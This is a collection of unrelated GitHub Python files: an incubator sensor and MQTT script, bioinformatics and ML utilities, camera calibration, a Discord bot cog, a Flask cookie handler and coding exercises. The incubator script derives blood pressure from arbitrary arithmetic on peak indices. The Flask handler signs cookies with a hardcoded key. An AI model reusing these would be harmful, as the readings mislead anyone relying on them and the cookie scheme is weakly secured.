add = (sum(pks[:1]))\n div = len(pks[:1])\n p=(np.diff(np.sign(np.diff(hr_int))) < 0).nonzero()[0] + 1 \n \n print(\"Peaks Detected: \",p)\n sys=np.mean(p)*8\n \n \n\n #DBP Calculation\n vall=find_peaks(hr_int,threshold=200, distance=20) \n add2 = sum(vall[:1])\n div2 = len(vall[:1])\n v=(np.diff(np.sign(np.diff(hr_int))) > 0).nonzero()[0] + 1\n print(\"local min: \",v)\n v_mean = np.mean(v)*8\n print(v_mean)\n dias=(sys-38)*0.9996\n print(\"Valleys detected: \",vall[:1])\n\n #MAP Estimation\n m_ap=(dias+(2*dias))*0.33\n print(\"Heart Rate: \",bpm)\n print(\"SBP: \",sys)\n print(\"DBP:\", dias)\n print(\"Mean Arterial Pressure: \",m_ap)\n\n #Send data to CayenneMQTT\n while True:\n \n client.loop()\n if (time.time() > timestamp + 10):\n client.virtualWrite(1,bpm)\n client.virtualWrite(3,sys)\n client.virtualWrite(4,dias)\n timestamp = time.time()\n \n time.sleep(0.3)\n \n if slaveSelect == \"2\":\n #opening serial port\n ser=serial.Serial('/dev/ttyACM0', 9600) \n temp = []\n while True:\n tem=bus.read_byte_data(OXY_ADDRESS,0)\n print(\"data from DHT22: \", tem)\n print(type(tem))\n serialdata=ser.readline().decode('utf-8').rstrip() \n print(\"data recieved: \",serialdata)\n temp.append(serialdata)\n print(type(temp))\n print(\"temp: \",temp)\n #temp=int(serialdata)\n client.loop()\n client.virtualWrite(2,temp)\n time.sleep(0.3)\n\n #WRITE ADDRESS OF ADITIONAL SENSORS\n \n #if slaveSelect == \"3\":\n # while True:\n # data1=bus.read_byte_data(slavex_address,0)\n # client.loop()\n # chan_x=5\n # client.virtualWrite(chan_x,data1)\n # time.sleep(0.3)\n #if slaveSelect == \"4\":\n # while True:\n # data2=bus.read_byte_data(slavex_address,0)\n # client.loop()\n # chan_y=6\n # client.virtualWrite(chan_y,data2)\n # time.sleep(0.3)\n \n #if slaveSelect == \"5\":\n # while True:\n # data3=bus.read_byte_data(slavex_address,0)\n # client.loop()\n # chan_z=7\n # client.virtualWrite(chan_z,data3)\n # time.sleep(0.3)\n \n\n","repo_name":"KamyHernandez/IncubatorSystem","sub_path":"main-code.py","file_name":"main-code.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31160361222","text":"\"\"\"\n This script is used to select one specific annotation from 5 different NCBI annotations for each transcript primarily based\n on the gene's functional annotation and secondary based on the highest bit_score value.\n\"\"\"\n\n\nimport re\ninput_file = open(\"BLASTP_M_corti.PRJEB510.WBPS15.protein_NCBI.txt\", 'r')\noutput_file = open (\"BLASTP_M_cort.PRJEB510.WBPS15.protein_NCBI_final.txt\", 'a+')\n\n\n\ngene = \"\"\nconcrete_gene = 0\nlast_transcript = \"\"\nfirst_line = \"\"\nunknown = [\"unknown\", \"hypothetical\", \"unnamed\"]\nfor line in input_file:\n splitter = re.split('\\t', line)\n transcript = splitter[0]\n if last_transcript == transcript and concrete_gene == 1: # transcript with concrete annotation\n continue\n elif last_transcript == transcript and concrete_gene == 0: # transcript with no concrete annotation\n gene = splitter[2]\n if any(un in gene for un in unknown):\n concrete_gene = 0\n else:\n concrete_gene = 1\n output_file.write(line)\n else:\n if last_transcript != transcript and concrete_gene == 0 and last_transcript != \"\": # transcript with all unknown annotations, write the first annotation\n output_file.write(first_line)\n last_transcript = transcript\n first_line = line # the first annotation\n gene = splitter[2]\n if any(un in gene for un in unknown):\n concrete_gene = 0\n else:\n concrete_gene = 1\n output_file.write(line)\n","repo_name":"korenal/Analyza_transkriptomu_DP","sub_path":"filtering_ncbi.py","file_name":"filtering_ncbi.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74048036623","text":"from inspect import signature\nfrom typing import Dict, Optional, Union\n\nimport torch\nfrom transformers import AutoConfig\nfrom auto_quant.quant.rtn.models import *\n\nRTN_CAUSAL_LM_MODEL_MAP = {\n \"bloom\": BloomRTNForCausalLM,\n \"gpt_neox\": GPTNeoXRTNForCausalLM,\n \"gptj\": GPTJRTNForCausalLM,\n \"gpt2\": GPT2RTNForCausalLM,\n \"llama\": LlamaRTNForCausalLM,\n \"opt\": OPTRTNForCausalLM,\n \"moss\": MOSSRTNForCausalLM,\n \"gpt_bigcode\": GPTBigCodeRTNForCausalLM,\n \"codegen\": CodeGenRTNForCausalLM,\n \"RefinedWebModel\": RWRTNForCausalLM,\n \"RefinedWeb\": RWRTNForCausalLM,\n \"falcon\": RWRTNForCausalLM,\n \"baichuan\": BaiChuanRTNForCausalLM,\n \"internlm\": InternLMRTNForCausalLM,\n \"qwen\": QwenRTNForCausalLM,\n \"mpt\": MptRTNForCausalLM,\n}\n\ndef check_and_get_model_type(model_dir, trust_remote_code=True):\n config = AutoConfig.from_pretrained(model_dir, trust_remote_code=trust_remote_code)\n if config.model_type not in RTN_CAUSAL_LM_MODEL_MAP.keys():\n raise TypeError(f\"{config.model_type} isn't supported yet. Only support: {list(RTN_CAUSAL_LM_MODEL_MAP.keys())}\")\n model_type = config.model_type\n return model_type\n\nclass AutoRTNForCausalLM:\n def __init__(self):\n raise EnvironmentError(\n \"AutoRTNForCausalLM is designed to be instantiated\\n\"\n \"using `AutoRTNForCausalLM.from_pretrained` if want to quantize a pretrained model.\\n\"\n \"using `AutoRTNForCausalLM.from_quantized` if want to inference with quantized model.\"\n )\n\n @classmethod\n def from_pretrained(\n self, \n model_path, \n quant_config: RTNConfig, \n max_memory: Optional[dict] = None,\n torch_dtype: torch.dtype = torch.float16,\n trust_remote_code: bool = False,\n **kwargs\n ) -> BaseRTNForCausalLM:\n \n model_type = check_and_get_model_type(model_path, trust_remote_code)\n return RTN_CAUSAL_LM_MODEL_MAP[model_type].from_pretrained(\n model_path, \n quant_config=quant_config,\n max_memory=max_memory,\n torch_dtype=torch_dtype,\n trust_remote_code=trust_remote_code,\n **kwargs\n )\n\n @classmethod\n def from_quantized(\n self, \n quant_path, \n device: Optional[Union[str, int]] = None,\n device_map: Optional[Union[str, Dict[str, Union[int, str]]]] = None,\n max_memory: Optional[dict] = None,\n low_cpu_mem_usage: bool = False,\n torch_dtype: torch.dtype = torch.float16, \n trust_remote_code: bool = False,\n **kwargs\n ) -> BaseRTNForCausalLM:\n model_type = check_and_get_model_type(quant_path, trust_remote_code)\n quant_func = RTN_CAUSAL_LM_MODEL_MAP[model_type].from_quantized\n # A static list of kwargs needed for huggingface_hub\n huggingface_kwargs = [\n \"cache_dir\",\n \"force_download\",\n \"proxies\",\n \"resume_download\",\n \"local_files_only\",\n \"use_auth_token\",\n \"revision\",\n \"subfolder\",\n \"_raise_exceptions_for_missing_entries\",\n \"_commit_hash\"\n ]\n keywords = {\n key: kwargs[key]\n for key in list(signature(quant_func).parameters.keys()) + huggingface_kwargs\n if key in kwargs\n }\n return quant_func(\n quant_path,\n device=device,\n device_map=device_map,\n max_memory=max_memory,\n low_cpu_mem_usage=low_cpu_mem_usage,\n torch_dtype=torch_dtype, \n trust_remote_code=trust_remote_code, \n **kwargs\n )","repo_name":"qwopqwop200/AutoQuant","sub_path":"auto_quant/quant/rtn/models/auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"15118454827","text":"import sys\nimport cv2\nimport numpy as np\nimport os\nimport glob\nimport ipdb\n\nif len(sys.argv)!=4:\n print('please enter: python run_cam_calib.py image_path chess_width_dim chess_height_dim')\n exit()\nelse:\n image_path = sys.argv[1]\n chess_width_dim = int(sys.argv[2])\n chess_height_dim = int(sys.argv[3])\n \n\nsquare_size = 2.0\n\n\nresult_image_path = image_path + '/result/'\nif not os.path.exists(result_image_path):\n os.makedirs(result_image_path)\n\n# Defining the dimensions of checkerboard\nCHECKERBOARD = (chess_height_dim,chess_width_dim)\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n# Creating vector to store vectors of 3D points for each checkerboard image\nobjpoints = []\n# Creating vector to store vectors of 2D points for each checkerboard image\nimgpoints = [] \n\n\n# Defining the world coordinates for 3D points\nobjp = np.zeros((1, CHECKERBOARD[0] * CHECKERBOARD[1], 3), np.float32)\nobjp[0,:,:2] = np.mgrid[0:CHECKERBOARD[0], 0:CHECKERBOARD[1]].T.reshape(-1, 2)\nobjp *= square_size\n\nprev_img_shape = None\n\n\n# Extracting path of individual image stored in a given directory\nimg_path_with_ext = image_path + '/*.jpg'\nimages = glob.glob(img_path_with_ext)\ni = 0\nj = 0\nfor fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n h,w = gray.shape\n ipdb.set_trace()\n # Find the chess board corners\n # If desired number of corners are found in the image then ret = true\n print(\"find chessboardcorner in %d image\"%i)\n if h > 2000:\n small_gray = cv2.resize(gray,(w//2,h//2))\n ret, corners = cv2.findChessboardCorners(small_gray, CHECKERBOARD, cv2.CALIB_CB_ADAPTIVE_THRESH + cv2.CALIB_CB_FAST_CHECK + cv2.CALIB_CB_NORMALIZE_IMAGE)\n\n if ret==True:\n corners = 2*corners \n else:\n ret, corners = cv2.findChessboardCorners(gray, CHECKERBOARD, cv2.CALIB_CB_ADAPTIVE_THRESH + cv2.CALIB_CB_FAST_CHECK + cv2.CALIB_CB_NORMALIZE_IMAGE)\n \n \"\"\"\n If desired number of corner are detected,\n we refine the pixel coordinates and display \n them on the images of checker board\n \"\"\"\n if ret == True:\n print(\"image %d find corner!\"%i)\n j = j+1\n objpoints.append(objp)\n # refining pixel coordinates for given 2d points.\n corners2 = cv2.cornerSubPix(gray, corners, (5,5),(-1,-1), criteria)\n \n imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, CHECKERBOARD, corners2, ret)\n \n img_filename = result_image_path + '/chess_img_%02d_find.jpg'%i\n else:\n img_filename = result_image_path + '/chess_img_%02d_not_find.jpg'%i\n\n i = i +1\n cv2.imwrite(img_filename,img)\n \nfind_ratio = j/i\nprint('the ratio of findcorner is %f'%(find_ratio))\n\n\"\"\"\nPerforming camera calibration by \npassing the value of known 3D points (objpoints)\nand corresponding pixel coordinates of the \ndetected corners (imgpoints)\n\"\"\"\n\n\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\nmean_error = 0\n\nfor i in range(len(objpoints)):\n imgpoints2, _ = cv2.projectPoints(objpoints[i], rvecs[i], tvecs[i], mtx, dist)\n error = cv2.norm(imgpoints[i], imgpoints2, cv2.NORM_L2)/len(imgpoints2)\n mean_error += error\n\n\navg_error = mean_error/len(objpoints)\n\nprint(\"\\nrms: %f, error: %f\\n\"%(ret,avg_error))\nprint(\"Camera matrix : \\n\")\nprint(mtx)\nprint(\"dist : \\n\")\nprint(dist)\n\n\n\nfc = open('%s/calib.txt'%result_image_path,'w+')\nfc.write('camera_intrinsc:\\n')\nfc.write('-------------------------------------------------------\\n')\nfc.write('rms: %f, error: %f\\n\\n'%(ret,avg_error))\nfc.write('camera matrix:\\n')\nfc.write('[ %e, %e, %e]\\n'%(mtx[0][0],mtx[0][1],mtx[0][2]))\nfc.write('[ %e, %e, %e]\\n'%(mtx[1][0],mtx[1][1],mtx[1][2]))\nfc.write('[ %e, %e, %e]\\n'%(mtx[2][0],mtx[2][1],mtx[2][2]))\nfc.write('\\ndistortion:\\n[%e, %e, %e, %e, %e]\\n'%(dist[0][0],dist[0][1],dist[0][2],dist[0][3],dist[0][4]))\nfc.write('-------------------------------------------------------\\n')\nfc.write('\\n %f %% image can find corner\\n'%(find_ratio*100))\nfc.close()\n\n\n\n\n\n# #camera matrix with lens distortion\nnewcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,gray.shape[::-1],0,gray.shape[::-1])\n\ni = 0\nfor fname in images:\n img = cv2.imread(fname)\n # undistort\n dst = cv2.undistort(img, mtx, dist, None, newcameramtx)\n\n # crop the image\n x,y,w,h = roi\n dst = dst[y:y+h, x:x+w]\n i=i+1\n \n undist_and_dist_img =cv2.vconcat([img,dst])\n img_filename = result_image_path + '/undist_img_%02d.jpg'%i\n cv2.imwrite(img_filename, undist_and_dist_img)\n \n\n\n\n\n","repo_name":"lesialin/video_stab","sub_path":"utility/camera_calibration/run_cam_calib.py","file_name":"run_cam_calib.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"47"} +{"seq_id":"36443607446","text":"import numpy as np\nimport pandas as pd\nfrom gensim.utils import simple_preprocess\nfrom gensim.models.doc2vec import TaggedDocument, Doc2Vec\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\n\nclass Doc2VecModel(BaseEstimator, TransformerMixin):\n def __init__(self, dm=1, vector_size=1, window=1, epochs=5, **args):\n self.size = vector_size\n self.window = window\n self.dm = dm\n self.epochs = epochs\n self.model = Doc2Vec(vector_size=self.size, window=self.window,\n dm=self.dm, epochs=self.epochs, **args)\n self.tagged_documents = None\n self.incrementer = -1 # for indexing each document\n\n def tag_example(self, raw_document):\n self.incrementer += 1\n return TaggedDocument(words=raw_document, tags=[self.incrementer])\n\n def fit(self, raw_documents):\n processed_documents = raw_documents.apply(simple_preprocess, )\n\n # Generate Tagged Examples\n self.tagged_documents = processed_documents.apply(self.tag_example, )\n\n # Build vocabulary\n self.model.build_vocab(corpus_iterable=self.tagged_documents)\n\n if len(self.model.wv.key_to_index) == 0:\n raise Exception(\"Either number of min_count is very less or no sample is present is input data.\")\n\n # Train model\n self.model.train(corpus_iterable=self.tagged_documents,\n total_examples=self.model.corpus_count,\n epochs=self.model.epochs)\n\n def score(self):\n ranks = []\n for tagged_document in self.tagged_documents:\n try:\n inferred_vector = self.model.infer_vector(self.tagged_documents[tagged_document.tags[0]].words)\n except IndexError:\n continue\n sims = self.model.dv.most_similar([inferred_vector], topn=len(self.model.dv))\n rank = [docid for docid, sim in sims].index(tagged_document.tags[0])\n ranks.append(rank)\n counter_0 = ranks.count(0)\n return counter_0 / self.tagged_documents.shape[0]\n\n\ndef build_d2v(training_data: pd.Series, configs: dict):\n params = configs[\"D2V\"][\"PARAMS\"]\n d2v = Doc2VecModel(**params)\n d2v.fit(training_data)\n accuracy_score = d2v.score()\n return d2v, params, accuracy_score\n\n\n\"\"\"confi = {'D2V': {'PARAMS': {'alpha': 0.025, 'dbow_words': 1, 'dm': 1, 'epochs': 100,\n 'min_alpha': 0.001, 'min_count': 1,\n 'vector_size': 5, 'window': 1\n }\n }\n }\n\ntrain_series = pd.Series([\"graphic designer adobe illustrator adobe photoshop adobe\",\n \"big data concepts logical thinking\",\n \"analyst microsoft excel tableau\",\n \"machine learning deep learning data science\",\n \"react js javascript swift android developer\"\n ],\n name='features'\n )\n\nmodel, par, score = build_d2v(training_data=train_series, configs=confi)\n\nprint(type(model))\nprint(par)\nprint(score)\n\"\"\"","repo_name":"prem-rawat-glosity/careers-recommendation","sub_path":"modelling/d2v_model.py","file_name":"d2v_model.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22133070982","text":"while True:\n try:\n n = int(input())\n except:\n break\n bits = n & 0xffffffff\n ans = 0\n op = bits & 0x000000ff\n ans = ans | (op << 24)\n op = bits & 0x0000ff00\n ans = ans | (op << 8)\n op = bits & 0x00ff0000\n ans = ans | (op >> 8)\n op = bits & 0xff000000\n ans = ans | (op >> 24)\n \n if ans & (1 << 31):\n ans -= 0x100000000\n print(n, 'converts to', ans)\n","repo_name":"shhrrtnvr/uva_in_python","sub_path":"uva_594_onelittletwolittletreelittleendians.py","file_name":"uva_594_onelittletwolittletreelittleendians.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71157183183","text":"\"\"\"\nThis file is part of KIGM-Discord-Bot.\n\nKIGM-Discord-Bot is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nKIGM-Discord-Bot is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with KIGM-Discord-Bot. If not, see .\n\"\"\"\n\nimport asyncio\nimport os\nimport random\n\nimport asyncpraw\nimport discord\nfrom discord import utils\nimport humor_langs\n\n# from PIL import Image\n# from io import BytesIO\nfrom discord.ext import commands\nfrom discord.ext.commands import BucketType, cooldown\n\n\nclass FunCommands(commands.Cog, name=\"😄 Fun Commands\"):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(description=\"pls dont spam this command\")\n @commands.guild_only()\n @cooldown(1, 2, BucketType.user)\n async def meme(self, ctx):\n if len(self.bot.av_memes) > 0:\n _meme = random.choice(self.bot.av_memes)\n self.bot.av_memes.remove(_meme)\n sub_origin = _meme.subreddit\n await sub_origin.load()\n memebed = discord.Embed(\n title=_meme.title,\n description=f\"**Subreddit:** `r/{sub_origin.display_name}`\\n**Author:** `u/{_meme.author.name}`\",\n color=self.bot.main_color,\n url=\"https://www.reddit.com{}\".format(_meme.permalink),\n )\n\n memebed.set_author(name=ctx.author, icon_url=ctx.author.avatar_url)\n memebed.set_image(url=_meme.url)\n memebed.set_footer(text=f\"👍 {_meme.score} 💬 {_meme.num_comments}\")\n\n await ctx.send(embed=memebed)\n else:\n await ctx.error(\"No juicy memes found.\")\n await self.bot.renew_memes()\n\n @commands.command(description=\"Convert text to binary00101001\")\n @commands.guild_only()\n async def binary(self, ctx, *, text):\n res = \"\".join(format(i, \"b\") for i in bytearray(text, encoding=\"utf-8\"))\n embed = discord.Embed(title=\"Text To Binary\", color=self.bot.main_color)\n embed.add_field(name=\"Normal Text:\", value=text, inline=False)\n embed.add_field(name=\"Binary Text:\", value=f\"`{str(res)}`\", inline=False)\n embed.set_footer(\n text=f\"Requested By {ctx.author}\", icon_url=ctx.author.avatar_url\n )\n\n await ctx.send(embed=embed)\n\n @commands.command(\n description=\"Returns a (really bad) dad joke to you\",\n aliases=[\"dadjokes\", \"djoke\", \"dadj\"],\n )\n @commands.guild_only()\n async def dadjoke(self, ctx):\n async with self.bot.session.get(\"https://icanhazdadjoke.com\", headers={\"Accept\": \"text/plain\"}) as resp:\n joke = await resp.text()\n\n if \"’\" in joke:\n better_joke = joke.replace(\"’\", \"'\")\n embed = discord.Embed(\n title=\"Heard this joke from dad! :bearded_person:\",\n description=better_joke,\n colour=discord.Colour.blue(),\n )\n embed.set_footer(\n icon_url=ctx.author.avatar_url, text=f\"Requested by: {ctx.author.name}\"\n )\n else:\n embed = discord.Embed(\n title=\"Heard this joke from daddy! :bearded_person:\",\n description=joke,\n colour=discord.Colour.blue(),\n )\n embed.set_footer(\n icon_url=ctx.author.avatar_url, text=f\"Requested by {ctx.author.name}\"\n )\n\n embed.set_author(\n name=\"All dad jokes from icanhazdadjoke.com so shoutout to them\"\n )\n await ctx.send(embed=embed)\n\n @commands.command(description=\"lol idk manipulate me to saying something\")\n @commands.guild_only()\n @cooldown(1, 5, BucketType.user)\n async def say(self, ctx):\n await ctx.message.delete()\n embed = discord.Embed(\n title=\"Go. Tell me what you want me to say\",\n description=\"||If you don't tell me what I'm going to say in less than 20 seconds, the command won't execute.||\",\n color=self.bot.main_color,\n )\n sent = await ctx.send(embed=embed)\n\n resp_content = await ctx.input(dr=True, delete_after=6.0)\n\n if not resp_content:\n ctx.command.reset_cooldown(ctx)\n return\n\n try:\n await sent.delete()\n except discord.HTTPException:\n pass\n\n await ctx.send(resp_content)\n\n @commands.command(description=\"Converts your text to OwO ^--^\", aliases=[\"0w0\"])\n @commands.guild_only()\n async def owo(self, ctx, *, sentence: utils.escape_mentions):\n await ctx.message.reply(humor_langs.owofy(sentence), mention_author=True)\n\n @commands.command(description=\"Converts your text to BriIsh\", aliases=[\"british\"])\n @commands.guild_only()\n async def britishaccent(self, ctx, *, sentence: utils.escape_mentions):\n await ctx.message.reply(\n humor_langs.strong_british_accent(sentence), mention_author=True\n )\n\n @commands.command(\n description=\"Converts your text to emoji! 💩\",\n aliases=[\"texttoemoji\", \"emojithis\", \"tte\"],\n )\n @commands.guild_only()\n async def text_to_emoji(self, ctx, *, sentence: utils.escape_mentions):\n await ctx.message.reply(humor_langs.text_to_emoji(sentence), mention_author=True)\n\n @commands.command(\n description=\"Clap your way with adding the clap :clap: emoji between every letter/word!\",\n aliases=[\"clapify\"],\n )\n async def clap(self, ctx, *, phrase: utils.escape_mentions):\n await ctx.message.reply(humor_langs.clap_emojifier(phrase), mention_author=True)\n\n @commands.command(description=\"V i r t u a l s l a p p\", aliases=[\"slapp\"])\n @commands.guild_only()\n async def slap(self, ctx, *, User: discord.Member):\n slap_gif = [\n \"https://tenor.com/view/bobs-burgers-louise-louise-slaps-slap-gif-12656044\",\n \"https://tenor.com/view/dog-slap-gif-3468779\",\n \"https://tenor.com/view/slap-virtual-slap-boglio-laurene-boglio-gif-13857116\",\n \"https://tenor.com/view/amanda-bynes-slap-gif-4079563\",\n \"https://tenor.com/view/baka-slap-huh-angry-gif-15696850\",\n ]\n slap_gifs = random.choice(slap_gif)\n\n if User.id == ctx.guild.me.id:\n await ctx.send(\n \"https://tenor.com/view/hell-no-disagree-no-nope-never-gif-14721955\"\n )\n\n elif ctx.author.mention == User.mention:\n await ctx.send(\"weirdo\")\n await ctx.send(\n \"https://tenor.com/view/sgo48-slap-sgo48nini-slap-your-self-gif-15092286\"\n )\n else:\n await ctx.channel.send(\n ctx.author.mention + f\" has slapped \" + User.mention + \"! :scream:\"\n )\n await ctx.channel.send(slap_gifs)\n\n @commands.command(\n description=\"Disclaimer: Do not try this at home\", aliases=[\"shot\"]\n )\n async def shoot(self, ctx, *, User: discord.Member = None):\n shoot_gif = [\n \"https://tenor.com/view/die-gun-shotgun-deus-vult-gif-17767114\",\n \"https://tenor.com/view/gun-shotgun-shooting-fire-cartoon-gif-14404861\",\n \"https://tenor.com/view/gun-gunshot-gunfire-gif-15642482\",\n \"https://tenor.com/view/water-gun-melissa-mc-carthy-gotcha-attack-childish-gif-7720147\",\n \"https://tenor.com/view/kermit-shoot-lol-gun-frog-gif-16181496\",\n \"https://tenor.com/view/cat-shooting-mouth-open-gif-15017033\",\n ]\n shoot_gifs = random.choice(shoot_gif)\n\n if User is None:\n await ctx.send(\"K I'll shoot u instead lol\")\n await ctx.send(shoot_gifs)\n\n elif ctx.author.mention == User.mention:\n await ctx.send(\"why r u like this\")\n await ctx.send(\"I hope ur ok\")\n await ctx.send(\"pls don't be that type of person\")\n await ctx.send(\"I hope you're fine :) :heartpulse:\")\n\n elif User.id == ctx.guild.me.id:\n await ctx.send(\"not happening lol\")\n\n else:\n await ctx.channel.send(\n ctx.author.mention + f\" has shot \" + User.mention + \"! :scream: \"\n )\n await ctx.channel.send(shoot_gifs)\n\n @commands.command(description=\"Just type it and see what happens...\")\n async def YEET(self, ctx, User: discord.Member = None):\n if User is None:\n await ctx.send(\n \":woman_cartwheeling:\\n :manual_wheelchair: :man_golfing:\"\n )\n else:\n await ctx.send(\n f\":woman_cartwheeling:\\n ^\"\n + User.mention\n + f\"\\n :manual_wheelchair: :man_golfing:\\n ^{ctx.author.mention}\"\n )\n\n @commands.command(description=\"will give you a random spoiler from a movie!\")\n async def spoiler(self, ctx):\n await ctx.message.reply(\n \"https://media.discordapp.net/attachments/767572984860508160/770165174891184148/image0.gif\",\n mention_author=True,\n )\n\n\ndef setup(bot):\n bot.add_cog(FunCommands(bot))\n","repo_name":"Makiyu-py/KIGM-Discord-Bot","sub_path":"cogs/comms/cog_fun.py","file_name":"cog_fun.py","file_ext":"py","file_size_in_byte":9477,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"4429600026","text":"try:\n entrada = input(\"Ingrese nombre del archivo: \")\n archivo = open(entrada, \"r\", encoding=\"UTF-8\") \n for linea in archivo:\n print(linea.upper())\nexcept:\n print(\"Error, no existe el\")\n\n\n\n\n#print(archivo.read())\n#encoding: f_8 normalmente usado r read a applicate \n#por cada línea en el archivo ,,entrada,\"r\", \"names.txt\", \"a\", encoding=\"UTF-8\"","repo_name":"Micor24/TEA","sub_path":"shout.py","file_name":"shout.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72625600144","text":"\"\"\"\nInput: nums = [1,1,2]\nOutput: 2, nums = [1,2]\n\nInput: nums = [0,0,1,1,1,2,2,3,3,4]\nOutput: 5, nums = [0,1,2,3,4]\n\nExplanation: Your function should return length = 2, with the first two elements of nums being 1 and 2 respectively. \nIt doesn't matter what you leave beyond the returned length.\n\"\"\"\n\nclass Solution:\n def removeDuplicates(self, nums):\n i=0\n while i < len(nums)-1:\n if nums[i] == nums[i+1]:\n del nums[i]\n i -= 1\n i += 1\n return nums\n \n\ns = Solution()\nprint(s.removeDuplicates([0,0,0,0,0,1,1,1,2,2,3,3,3,4,4]))","repo_name":"kartikeyab/leetcode-prac","sub_path":"arrays/remove_duplicate_inplace.py","file_name":"remove_duplicate_inplace.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33243521494","text":"import hmac\nfrom flask import make_response, request, redirect\nfrom flask.views import MethodView\nfrom datetime import datetime, date\n\nbase_path = './static/%s'\nadmin_username = 'ljj'\n\nclass PageHandler(MethodView):\n\tdef render(self, content):\n\t\tresp = make_response(content)\n\t\treturn resp\n\n\tdef render_json(self, content):\n\t\tresp = make_response(content)\n\t\tresp.headers['content-type'] = 'application/json'\n\t\treturn resp\n\n\tdef render_file(self, filename):\n\t\tfilepath = base_path % filename\n\t\twith open(filepath, 'r') as f:\n\t\t\tcontent = f.read()\n\t\t\treturn self.render(content)\n\n\tdef get_args(self, key):\n\t\treturn request.args.get(key)\n\n\tdef get_date(self, year=0, month=0, day=0):\n\t\tif year and month and day:\n\t\t\treturn date(year, month, day)\n\t\telse:\n\t\t\treturn date.today()\n\n\tdef get_referer(self):\n\t\treturn request.headers.get('referer')\n\n\tdef get_cookies(self):\n\t\treturn request.cookies\n\n\tdef get_form(self):\n\t\tform = {}\n\t\tif request.is_json:\n\t\t\t# type-dict\n\t\t\tform = request.get_json()\n\t\telse:\n\t\t\tform = request.form.to_dict()\n\t\treturn form\n\n\tdef login(self, user):\n\t\tresp = make_response('succ')\n\t\tresp.set_cookie(key='username', value=user.username, max_age=3600)\n\t\tuid_and_digest = make_secure_cookie(user.uid, user.username)\n\t\tresp.set_cookie(key='uid', value=uid_and_digest, max_age=3600)\n\t\tresp.set_cookie(key='nickname', value=user.nickname, max_age=3600)\n\t\treturn resp\n\n\tdef logout(self):\n\t\ttarget = '/'\n\t\tresp = redirect(target)\n\t\tresp.set_cookie(key='username', value='')\n\t\tresp.set_cookie(key='uid', value='')\n\t\tresp.set_cookie(key='nickname', value='')\n\t\treturn self.render(resp)\n\n\tdef is_valid_cookies(self):\n\t\ttry:\n\t\t\tcookies = request.cookies\n\t\t\tuid_and_digest = cookies.get('uid')\n\t\t\tusername = cookies.get('username')\n\t\t\treturn check_secure_cookies(uid_and_digest, username)\n\t\texcept Exception as e:\n\t\t\treturn False\n\n\tdef is_admin(self):\n\t\tusername = self.get_username()\n\t\tif username == admin_username:\n\t\t\treturn True\n\t\treturn False\n\n\tdef get_username(self):\n\t\ttry:\n\t\t\tcookies = request.cookies\n\t\t\tusername = cookies.get('username')\n\t\t\treturn username\n\t\texcept Exception as e:\n\t\t\treturn ''\n\n\tdef redirect_to_target(self, target='/'):\n\t\treturn self.render(redirect(target))\n\n# DK is the generated derived key\n# A derived key is a key, which may be calculated (derived) by a well-defined algorithm, usually referred to as a key derivation function, from an input consisting of public as well as secret data (e.g., a master key or primary key).\nhkey = 'dk_Huygens'.encode()\ndef make_secure_cookie(uid, username):\n\tmsg = uid + username\n\tdigest = hmac.new( hkey, msg.encode() ).hexdigest()\n\tuid_and_digest = '%s|%s' % (uid, digest)\n\treturn uid_and_digest\n\ndef check_secure_cookies(uid_and_digest, username):\n\tif uid_and_digest:\n\t\tuid = uid_and_digest.split('|')[0]\n\t\tus_uid_and_digest = make_secure_cookie(uid, username)\n\t\treturn uid_and_digest == us_uid_and_digest\n\telse:\n\t\treturn False","repo_name":"USTC-Titanic/webapp","sub_path":"page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"22740911389","text":"\nn = int(input())\ngraph = [list(map(int, input().split())) for _ in range(n)]\nvisited = [False]*n\nans = []\nres = 1000000\n\n\ndef dfs(depth):\n global ans\n global res\n if depth == n:\n t1, t2 = 0, 0\n for i in ans:\n print(i, end=' ')\n print()\n # for i in range(n-1):\n # if i-1 == (n // 2):\n # continue\n # if i < n//2:\n # t1 += graph[ans[i]][ans[i+1]] + graph[ans[i+1]][ans[i]]\n # else:\n # t2 += graph[ans[i]][ans[i+1]] + graph[ans[i+1]][ans[i]]\n # print(\"Power :\", t1, t2)\n # res = min(res, abs(t1-t2))\n return\n for i in range(n):\n if visited[i]:\n continue\n visited[i] = True\n ans.append(i)\n dfs(depth+1)\n visited[i] 